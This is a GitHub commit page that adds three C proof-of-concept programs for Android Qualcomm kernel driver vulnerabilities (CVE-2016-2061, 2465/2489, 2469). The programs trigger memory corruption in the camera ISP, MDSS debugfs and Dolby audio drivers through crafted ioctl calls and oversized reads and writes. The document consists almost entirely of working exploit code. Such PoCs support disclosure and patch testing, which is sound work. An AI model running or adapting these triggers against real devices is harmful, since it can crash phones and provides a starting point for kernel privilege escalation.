PoCs for June Bulletin, except CVE-2016-2066

Signed-off-by: Scott Bauer <sbauer@plzdonthack.me>
0os · Jun 6, 2016 · ed63ecc · ed63ecc
1 parent e43f35d
commit ed63ecc
Show file tree

Hide file tree

Showing 3 changed files with 218 additions and 0 deletions.
diff --git a/CVE-2016-2061.c b/CVE-2016-2061.c
@@ -0,0 +1,48 @@
+/**
+ *
+ * CVE-2016-2061.c
+ * https://code.google.com/p/android/issues/detail?id=201060
+ *
+ * https://android.googlesource.com/kernel/msm.git/+/android-msm-angler-3.10-marshmallow-mr1/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c#30
+ *
+ * Use: -I ./kernels/msm/include/media/
+ */
+
+
+#include <stdlib.h>
+#include <stdio.h>
+#include <unistd.h>
+#include <sys/ioctl.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include "msmb_isp.h" //./include/media/msmb_isp.h
+
+
+static int open_subdev(const char* dev)
+{
+	int fd = open(dev, O_RDWR);
+	if (fd < 0) {
+		printf("Failed to open %s\n", dev);
+		exit(EXIT_FAILURE);
+	}
+	return fd;
+}
+
+static void break_stuff(int fd) {
+	struct msm_vfe_axi_stream_request_cmd stream_cfg_cmd = { 0 };
+	int i;
+	for (i = INT_MIN; i < 0 ; i++) {
+		stream_cfg_cmd.stream_src = i;
+		printf("ioctl on %d\n", i);
+		ioctl(fd, VIDIOC_MSM_ISP_REQUEST_STREAM, &stream_cfg_cmd);
+	}
+
+}
+int main(void)
+{
+	int fd = -1;
+	fd = open_subdev("/dev/v4l-subdev14");
+	break_stuff(fd);
+
+}
diff --git a/CVE-2016-2465-AND-CVE-2016-2489.c b/CVE-2016-2465-AND-CVE-2016-2489.c
@@ -0,0 +1,66 @@
+/**
+ *
+ * CVE-2016-2464 And CVE-2016-2489.c
+ * https://code.google.com/p/android/issues/detail?id=201497
+ *
+ *
+ */
+
+
+#include <stdlib.h>
+#include <stdio.h>
+#include <unistd.h>
+#include <sys/ioctl.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <sys/mman.h>
+#include <fcntl.h>
+
+
+/**
+ *
+ * https://android.googlesource.com/kernel/msm.git/+/android-msm-angler-3.10-marshmallow-mr1/drivers/video/msm/mdss/mdss_debug.c#777
+ *
+ */
+static void doMdssPerfModeReadArbWrite(void)
+{
+	int fd = open("/sys/kernel/debug/mdp/perf_mode", O_RDONLY);
+	int ret;
+	void *mmap_ = mmap(NULL, 0x655350, PROT_READ | PROT_WRITE,
+			  MAP_ANON | MAP_PRIVATE,
+			  -1, 0);
+
+	if (mmap_ == MAP_FAILED) {
+		printf("Failed to get some vaddr with %s\n", strerror(errno));
+		exit(EXIT_FAILURE);
+	}
+
+
+	if (fd > 0) {
+		ret = read(fd, mmap_, 0x655350);
+		close(fd);
+	}
+}
+
+/**
+ *
+ *
+ * https://android.googlesource.com/kernel/msm.git/+/android-msm-angler-3.10-marshmallow-mr1/drivers/video/msm/mdss/mdss_debug.c#880
+ *
+ */
+static void doMdssPanicWriteOverflow(void)
+{
+	int fd = open("/sys/kernel/debug/mdp/perf/disable_panic", O_WRONLY);
+	int ret;
+	char ignore[32] = { 0xA };
+
+	if (fd > 0) {
+	        ret = write(fd, ignore, sizeof(ignore));
+		close(fd);
+	}
+}
+
+int main(void) {
+	doMdssPanicWriteOverflow();
+	doMdssPerfModeReadArbWrite();
+}
diff --git a/CVE-2016-2469.c b/CVE-2016-2469.c
@@ -0,0 +1,104 @@
+/**
+ *
+ * CVE-2016-2469.c
+ * https://code.google.com/p/android/issues/detail?id=202452
+ *
+ * https://android.googlesource.com/kernel/msm.git/+/android-msm-bullhead-3.10-marshmallow-mr1/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c#1473
+ *
+ * use -I ./kernels/msm/include/uapi/sound/
+ */
+
+#include <stdlib.h>
+#include <stdio.h>
+#include <unistd.h>
+#include <sys/ioctl.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <sys/mman.h>
+#include <fcntl.h>
+#include "devdep_params.h" //./include/uapi/sound/devdep_params.h
+
+
+enum {
+        DEVICE_NONE                     = 0x0,
+        /* output devices */
+        EARPIECE                        = 0x1,
+        SPEAKER                         = 0x2,
+        WIRED_HEADSET                   = 0x4,
+        WIRED_HEADPHONE                 = 0x8,
+        BLUETOOTH_SCO                   = 0x10,
+        BLUETOOTH_SCO_HEADSET           = 0x20,
+        BLUETOOTH_SCO_CARKIT            = 0x40,
+        BLUETOOTH_A2DP                  = 0x80,
+        BLUETOOTH_A2DP_HEADPHONES       = 0x100,
+        BLUETOOTH_A2DP_SPEAKER          = 0x200,
+        AUX_DIGITAL                     = 0x400,
+        ANLG_DOCK_HEADSET               = 0x800,
+        DGTL_DOCK_HEADSET               = 0x1000,
+        USB_ACCESSORY                   = 0x2000,
+        USB_DEVICE                      = 0x4000,
+        REMOTE_SUBMIX                   = 0x8000,
+        ANC_HEADSET                     = 0x10000,
+        ANC_HEADPHONE                   = 0x20000,
+        PROXY                           = 0x2000000,
+        FM                              = 0x100000,
+        FM_TX                           = 0x1000000,
+        DEVICE_OUT_DEFAULT              = 0x40000000,
+        DEVICE_OUT_ALL                  = 0x403FFFFF,
+};
+
+#define VOICE_PLAYBACK_TX 0x8005
+#define DOLBY_PARAM_ID_VDHE            0x0001074D
+#define DOLBY_PARAM_ID_VSPE            0x00010750
+
+static void trigger_slab_overflow(int fd, struct dolby_param_data *pass)
+{
+	pass->length = 200000000;
+	/*mmap(void *addr, size_t length, int prot, int flags,
+                  int fd, off_t offset);
+	*/
+	pass->data = mmap(NULL, 1000000000, PROT_READ, MAP_ANON, -1, 0);
+	if (pass->data == NULL) {
+		printf("failed to get 1gb of vm\n");
+		close(fd);
+		exit(EXIT_FAILURE);
+	}
+
+	ioctl(fd, SNDRV_DEVDEP_DAP_IOCTL_SET_PARAM, pass);
+}
+
+static void trigger_user_deref(int fd, struct dolby_param_data *pass)
+{
+	pass->length = 20;
+	pass->data = (void*)0x15;
+	ioctl(fd, SNDRV_DEVDEP_DAP_IOCTL_SET_PARAM, pass);
+}
+
+
+int main(void)
+{
+	int i;
+	char dev[36] = { 0 };
+	int fd;
+
+	struct dolby_param_data pass;
+	/* setup sane params to pass a few checks */
+	pass.device_id = DEVICE_NONE;
+	pass.be_id = 1;
+	pass.param_id = DOLBY_PARAM_ID_VSPE;
+
+	//for (i = 0; i < 87; i++) {
+	snprintf(dev, sizeof(dev), "/dev/snd/%s", "hwC0D10");//devs[i]);
+	printf("Opening %s\n", dev);
+	fd = open(dev, O_WRONLY);
+	if (fd > 0) {
+		printf("ioctl\n");
+		sleep(2);
+		trigger_slab_overflow(fd, &pass);
+		//trigger_user_deref(fd, &pass);
+	}
+	else
+		printf("Error on %s with %s\n", dev, strerror(errno));
+
+	return EXIT_FAILURE;
+}